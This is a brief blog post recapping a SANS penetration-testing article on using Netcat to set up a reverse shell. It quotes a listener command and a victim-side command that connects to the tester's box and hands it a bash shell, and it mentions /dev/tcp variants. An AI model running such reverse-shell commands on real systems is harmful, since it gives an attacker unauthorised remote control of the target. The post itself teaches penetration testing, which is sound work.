What do you do if you have a Netcat that doesn’t support the -e or -c options to run a shell or your target doesn’t support /dev/tcp?

On SANS Penetration Testing Blog i’ve read a really useful article about Netcat, espacially about using this tool to create a reverse backdoor shell during a penetration test.

The post, written by Ed Skoudis, start with a description of Netcat and a simple example of backdoor shell:

Netcat is fantastic little tool included on most Linuxes and available for Windows as well. You can use Netcat (or its cousin, Ncat from the Nmap project) to create a reverse shell as follows:

First, on your own pen test machine, you create a Netcat listener waiting for the inbound shell from the target machine:

skodo@pentestbox# nc -nvlp 443

Here, I’m telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), to listen (-l) on a given local port (-p).


Then, on the target machine, get the following command to execute (perhaps via command injection in a web app or some other attack technique):

victim$ nc pentestbox 443 -e /bin/bash

This command invokes a Netcat client on the victim, which connects to the attacker’s pentestbox on TCP port 443. The Netcat client then executes /bin/bash (-e /bin/bash) on the victim, connecting that shell’s Standard Input and Standard Output to the network.


Then, on the pentestbox machine, we’ll see the inbound connection, which we can type commands into as follows (typed commands in bold):

skodo@pentestbox# nc -nvlp 443
listening on [any] 443 ...
connect to [AttackerIPaddress] from (UNKNOWN) [VictimIPaddress]

Simple, right? But, what if you have a version of Netcat that doesn’t support the -e option?

You could use /dev/tcp to implement a Netcat-like backdoor without using Netcat, but to use that technique, you need to have a bash that supports /dev/tcp. 
However some Debian variants typically has a bash compiled without /dev/tcp support.

And at this point Ed Skoudis show us some techniques to create a reverse shell also in this restricted environments, i suggest to continue the reading on this link: